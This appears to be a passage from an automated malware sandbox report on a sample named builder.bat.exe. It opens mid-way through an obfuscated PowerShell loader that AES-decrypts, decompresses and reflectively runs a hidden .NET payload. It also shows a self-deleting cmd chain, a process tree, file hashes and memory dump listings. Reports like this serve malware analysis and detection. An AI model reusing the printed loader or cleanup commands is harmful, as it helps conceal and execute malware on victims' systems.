'')($snbQC);$qxpKv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2iK7UtzUwrolEWaIcQUhnQ==');$qxpKv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qxpKv, 0, $qxpKv.Length);$qxpKv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qxpKv);$AJQNv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KrSM+woEOB3Vezss7LVo2Q==');$AJQNv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AJQNv, 0, $AJQNv.Length);$AJQNv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AJQNv);$AfXGh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Wjsjcy3SC8ri3a9Bw4QkA==');$AfXGh = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AfXGh, 0, $AfXGh.Length);$AfXGh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AfXGh);$GCidc0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zah5Ks6KFV7nxV/Lj1cbNA==');$GCidc0 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc0, 0, $GCidc0.Length);$GCidc0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc0);$GCidc1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3d2GFulV4IACfF1Solw09Q==');$GCidc1 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc1, 0, $GCidc1.Length);$GCidc1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc1);$GCidc2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dmoVWHHHBRJhscv9vH7d+Q==');$GCidc2 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc2, 0, $GCidc2.Length);$GCidc2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc2);$GCidc3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Yy1MO8gEwf8dMKODGTzF5g==');$GCidc3 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc3, 0, $GCidc3.Length);$GCidc3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc3);$PwPCN.Dispose();$UaEuB1.Dispose();if (@(get-process -ea silentlycontinue $GCidc3).count -gt 1) {exit};$UtsnC = [Microsoft.Win32.Registry]::$AJQNv.$qxpKv($GCidc).$snbQC($hbuWR);$VFMJc=[string[]]$UtsnC.Split('\');$rhtBQ=XNrXq(OONaJ([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[1])));LWfQc $rhtBQ (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NvzQg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[0]);$UaEuB = New-Object System.Security.Cryptography.AesManaged;$UaEuB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$hVJMW = $UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')();$NvzQg = $hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NvzQg, 0, $NvzQg.Length);$hVJMW.Dispose();$UaEuB.Dispose();$JuLib = New-Object System.IO.MemoryStream(, $NvzQg);$yWMQI = New-Object System.IO.MemoryStream;$ovPeB = New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::$GCidc1);$ovPeB.$AfXGh($yWMQI);$ovPeB.Dispose();$JuLib.Dispose();$yWMQI.Dispose();$NvzQg = $yWMQI.ToArray();$fcYPL = $zmDYn | IEX;$ABDeF = $fcYPL::$GCidc2($NvzQg);$WyGRR = $ABDeF.EntryPoint;$WyGRR.$GCidc0($null, (, [string[]] ($ZzVHZ)))
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5116
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\builder.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\builder.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\builder.bat.exe"
                                                                                                4⤵
                                                                                                  PID:5296
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    5⤵
                                                                                                      PID:5312
                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                      PING localhost -n 8
                                                                                                      5⤵
                                                                                                      • Runs ping.exe
                                                                                                      PID:5424
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\builder.bat.exe"
                                                                                                      5⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:5588
                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                      ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\builder.bat.exe"
                                                                                                      5⤵
                                                                                                      • Views/modifies file attributes
                                                                                                      PID:5676
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                              1⤵
                                                                                                PID:3548
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                  PID:3736
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:3892
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:3140
                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4820
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                        1⤵
                                                                                                          PID:4468
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                          1⤵
                                                                                                            PID:5000
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                            1⤵
                                                                                                              PID:1196
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                              1⤵
                                                                                                                PID:2356
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                1⤵
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:2188
                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                1⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:2696
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                1⤵
                                                                                                                  PID:548
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:1200
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:2772
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:2236
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                        1⤵
                                                                                                                          PID:3556
                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          1⤵
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          PID:4032
                                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          1⤵
                                                                                                                            PID:1972
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                            1⤵
                                                                                                                              PID:3644
                                                                                                                            • C:\Windows\System32\mousocoreworker.exe
                                                                                                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:4728

                                                                                                                              Network

                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_da1lscwi.5e5.ps1
                                                                                                                                Filesize

                                                                                                                                60B

                                                                                                                                MD5

                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                SHA1

                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                SHA256

                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                SHA512

                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                Download Submit

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\builder.bat.exe
                                                                                                                                Filesize

                                                                                                                                442KB

                                                                                                                                MD5

                                                                                                                                04029e121a0cfa5991749937dd22a1d9

                                                                                                                                SHA1

                                                                                                                                f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                                SHA256

                                                                                                                                9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                                SHA512

                                                                                                                                6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                                Download Submit

                                                                                                                              • C:\Windows\System32\ucrtbased.dll
                                                                                                                                Filesize

                                                                                                                                1.8MB

                                                                                                                                MD5

                                                                                                                                7873612dddd9152d70d892427bc45ef0

                                                                                                                                SHA1

                                                                                                                                ab9079a43a784471ca31c4f0a34b698d99334dfa

                                                                                                                                SHA256

                                                                                                                                203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

                                                                                                                                SHA512

                                                                                                                                d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

                                                                                                                                Download Submit

                                                                                                                              • C:\Windows\System32\vcruntime140_1d.dll
                                                                                                                                Filesize

                                                                                                                                52KB

                                                                                                                                MD5

                                                                                                                                9ef28981adcbf4360de5f11b8f4ecff9

                                                                                                                                SHA1

                                                                                                                                219aaa1a617b1dfa36f3928bd1020e410666134f

                                                                                                                                SHA256

                                                                                                                                8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

                                                                                                                                SHA512

                                                                                                                                ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

                                                                                                                                Download Submit

                                                                                                                              • C:\Windows\System32\vcruntime140d.dll
                                                                                                                                Filesize

                                                                                                                                160KB

                                                                                                                                MD5

                                                                                                                                3e2fa187cc14eeafe172a66adcf1163a

                                                                                                                                SHA1

                                                                                                                                d5cdebdff516745d7f0b22d18698636e3afc36af

                                                                                                                                SHA256

                                                                                                                                aadb1a27b0c51323372fe39d263a90916fd61a5ac381cd73b02c6b8fad82542a

                                                                                                                                SHA512

                                                                                                                                a57c4139e8ac7ad1bc9a42397dd0e71ed36b8c3588fe21656bb1e26b4c79c2f2c6235f623acc9a9baa9c6d2851eac9432e7066c785d65e4f2dbed04203f4d905

                                                                                                                                Download Submit

                                                                                                                              • memory/336-105-0x0000021984AB0000-0x0000021984AD7000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                156KB

                                                                                                                                Download

                                                                                                                              • memory/336-106-0x00007FF8C8250000-0x00007FF8C8260000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                                Download

                                                                                                                              • memory/624-95-0x0000027489350000-0x0000027489371000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                132KB

                                                                                                                                Download

                                                                                                                              • memory/624-96-0x0000027489380000-0x00000274893A7000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                156KB

                                                                                                                                Download

                                                                                                                              • memory/624-97-0x00007FF8C8250000-0x00007FF8C8260000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                                Download

                                                                                                                              • memory/684-100-0x0000028CDCE50000-0x0000028CDCE77000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                156KB

                                                                                                                                Download

                                                                                                                              • memory/684-101-0x00007FF8C8250000-0x00007FF8C8260000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                                Download

                                                                                                                              • memory/736-112-0x0000029EA3970000-0x0000029EA3997000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                156KB

                                                                                                                                Download

                                                                                                                              • memory/736-113-0x00007FF8C8250000-0x00007FF8C8260000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                                Download

                                                                                                                              • memory/916-82-0x0000000140000000-0x0000000140028000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                160KB

                                                                                                                                Download

                                                                                                                              • memory/916-93-0x0000000140000000-0x0000000140028000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                160KB

                                                                                                                                Download

                                                                                                                              • memory/916-81-0x0000000140000000-0x0000000140028000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                160KB

                                                                                                                                Download

                                                                                                                              • memory/916-83-0x00007FF9081D0000-0x00007FF9083C5000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                                Download

                                                                                                                              • memory/916-84-0x00007FF906220000-0x00007FF9062DE000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                                Download

                                                                                                                              • memory/960-110-0x00007FF8C8250000-0x00007FF8C8260000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                                Download

                                                                                                                              • memory/960-109-0x000001ECC1BD0000-0x000001ECC1BF7000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                156KB

                                                                                                                                Download

                                                                                                                              • memory/1048-122-0x00007FF8C8250000-0x00007FF8C8260000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                                Download

                                                                                                                              • memory/1048-121-0x00000203CB1B0000-0x00000203CB1D7000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                156KB

                                                                                                                                Download

                                                                                                                              • memory/1124-124-0x000001AEAED00000-0x000001AEAED27000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                156KB

                                                                                                                                Download

                                                                                                                              • memory/1124-125-0x00007FF8C8250000-0x00007FF8C8260000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                                Download

                                                                                                                              • memory/1132-128-0x00007FF8C8250000-0x00007FF8C8260000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                                Download

                                                                                                                              • memory/1132-127-0x0000025CC46C0000-0x0000025CC46E7000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                156KB

                                                                                                                                Download

                                                                                                                              • memory/1140-130-0x000001EBF1B10000-0x000001EBF1B37000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                156KB

                                                                                                                                Download

                                                                                                                              • memory/1140-131-0x00007FF8C8250000-0x00007FF8C8260000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                                Download

                                                                                                                              • memory/1152-133-0x000001CED46B0000-0x000001CED46D7000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                156KB

                                                                                                                                Download

                                                                                                                              • memory/1152-134-0x00007FF8C8250000-0x00007FF8C8260000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                                Download

                                                                                                                              • memory/1284-136-0x0000020B703C0000-0x0000020B703E7000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                156KB

                                                                                                                                Download

                                                                                                                              • memory/1284-137-0x00007FF8C8250000-0x00007FF8C8260000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                                Download

                                                                                                                              • memory/1928-33-0x0000000140000000-0x0000000140004000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                16KB

                                                                                                                                Download

                                                                                                                              • memory/1928-30-0x0000000140000000-0x0000000140004000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                16KB

                                                                                                                                Download

                                                                                                                              • memory/3388-56-0x0000017FB3FA0000-0x0000017FB475C000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                7.7MB

                                                                                                                                Download

                                                                                                                              • memory/3388-53-0x00007FF9081D0000-0x00007FF9083C5000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                                Download

                                                                                                                              • memory/3388-54-0x00007FF906220000-0x00007FF9062DE000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                                Download

                                                                                                                              • memory/3388-55-0x0000017FB3B60000-0x0000017FB3FA2000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4.3MB

                                                                                                                                Download

                                                                                                                              • memory/3388-65-0x0000017FB52B0000-0x0000017FB5300000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                320KB

                                                                                                                                Download

                                                                                                                              • memory/3388-57-0x0000017FB4760000-0x0000017FB4BBC000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4.4MB

                                                                                                                                Download

                                                                                                                              • memory/3388-58-0x0000017FB4BC0000-0x0000017FB4C72000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                712KB

                                                                                                                                Download

                                                                                                                              • memory/3388-59-0x00007FF9081D0000-0x00007FF9083C5000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                                Download

                                                                                                                              • memory/3388-80-0x00007FF906220000-0x00007FF9062DE000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                                Download

                                                                                                                              • memory/3388-78-0x0000017FB5260000-0x0000017FB528E000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                184KB

                                                                                                                                Download

                                                                                                                              • memory/3388-79-0x00007FF9081D0000-0x00007FF9083C5000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                                Download

                                                                                                                              • memory/3388-68-0x0000017FB5300000-0x0000017FB533C000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                240KB

                                                                                                                                Download

                                                                                                                              • memory/3388-66-0x0000017FB53C0000-0x0000017FB5472000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                712KB

                                                                                                                                Download

                                                                                                                              • memory/3388-67-0x0000017FB5650000-0x0000017FB5812000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                1.8MB

                                                                                                                                Download

                                                                                                                              • memory/4432-27-0x00000181B9840000-0x00000181B984C000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                48KB

                                                                                                                                Download

                                                                                                                              • memory/4432-18-0x00007FF8E9180000-0x00007FF8E9C41000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                                Download

                                                                                                                              • memory/4432-26-0x00000181BBE70000-0x00000181BBEC8000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                352KB

                                                                                                                                Download

                                                                                                                              • memory/4432-25-0x00000181C6030000-0x00000181C62C8000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.6MB

                                                                                                                                Download

                                                                                                                              • memory/4432-24-0x00000181C5D40000-0x00000181C6028000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.9MB

                                                                                                                                Download

                                                                                                                              • memory/4432-22-0x00000181C4C90000-0x00000181C5D36000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                16.6MB

                                                                                                                                Download

                                                                                                                              • memory/4432-20-0x00007FF9081D0000-0x00007FF9083C5000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                                Download

                                                                                                                              • memory/4432-21-0x00007FF906220000-0x00007FF9062DE000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                                Download

                                                                                                                              • memory/4432-19-0x00000181B9810000-0x00000181B983C000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                176KB

                                                                                                                                Download

                                                                                                                              • memory/4432-28-0x00007FF9081D0000-0x00007FF9083C5000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                                Download

                                                                                                                              • memory/4432-17-0x00007FF8E9180000-0x00007FF8E9C41000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                                Download

                                                                                                                              • memory/4432-16-0x00000181BBBB0000-0x00000181BBBD2000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                136KB

                                                                                                                                Download

                                                                                                                              • memory/4432-6-0x00007FF8E9183000-0x00007FF8E9185000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                                Download

                                                                                                                              • memory/4432-369-0x00007FF8E9180000-0x00007FF8E9C41000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                                Download

                                                                                                                              • memory/4432-370-0x00007FF8E9183000-0x00007FF8E9185000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                                Download

                                                                                                                              • memory/4432-863-0x00007FF8FC5D3000-0x00007FF8FC5D4000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                                Download

                                                                                                                              • memory/4432-864-0x00007FF8E9180000-0x00007FF8E9C41000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                                Download